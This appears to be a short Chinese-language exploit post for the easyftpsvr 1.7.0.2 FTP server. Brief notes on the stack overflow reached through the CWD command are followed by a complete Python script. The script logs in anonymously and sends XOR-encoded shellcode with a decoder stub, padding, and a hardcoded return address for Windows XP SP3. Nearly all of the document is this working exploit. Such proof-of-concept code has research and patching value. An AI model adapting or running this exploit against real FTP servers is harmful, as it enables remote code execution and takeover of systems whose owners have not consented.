easyftpsvr-1.7.0.2 POC

程序是FTP软件

分析登陆发包情况

然后发送  'CWD XXXXXX' 造成溢出

熟悉 FTP命令！！

程序也有检测字符···

还不是很清楚  为什么 弹框没有显示字···························

环境   ：   XP SP3 中文   

easyftpsvr-1.7.0.2

import socket,sys
def ftp_test(ip,port):
	target = ip
	port = port
	shellcode = ('\x50\x20' 
'\xD9\xEE'           
'\xD9\x74\x24\xF4'     
'\x58'                
'\x83\xC0\x1b'     
'\x33\xC9'          
'\x8A\x1C\x08'       
'\x80\xF3\x11'        
'\x88\x1C\x08'      
'\x41'             
'\x80\xFB\x90'   
'\x75\xF1'  
'\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'  
'\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'  
'\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'  
'\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'  
'\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'  
'\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'  
'\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'  
'\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'  
'\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'  
'\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'  
'\x42\xee\x46\xed\x42\xee\x46\xe9\x81')#198


	buffer =  shellcode+'a'*(268-198)+'\xa0\x6f\x5f\x7d'
	#7D5F6FA0    59              pop ecx
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	try:
		connect = s.connect((target,port))
		print "[+] Connected!"
	except:
		print "[!] Connection failed!"
		sys.exit(0)
	h = s.recv(1024)
	print h
	s.send('USER anonymous\r\n')
	h = s.recv(1024)
	print h
	s.send('PASS anonymous\r\n')
	h = s.recv(1024)
	print h
	print "[+] Sending buffer"
	s.send('CWD '+ buffer + '\r\n')
	try:
		h = s.recv(1024)
		print h
		print "failed"
	except:
		print "ok"

if __name__ == '__main__':
	ftp_test('127.0.0.1',21)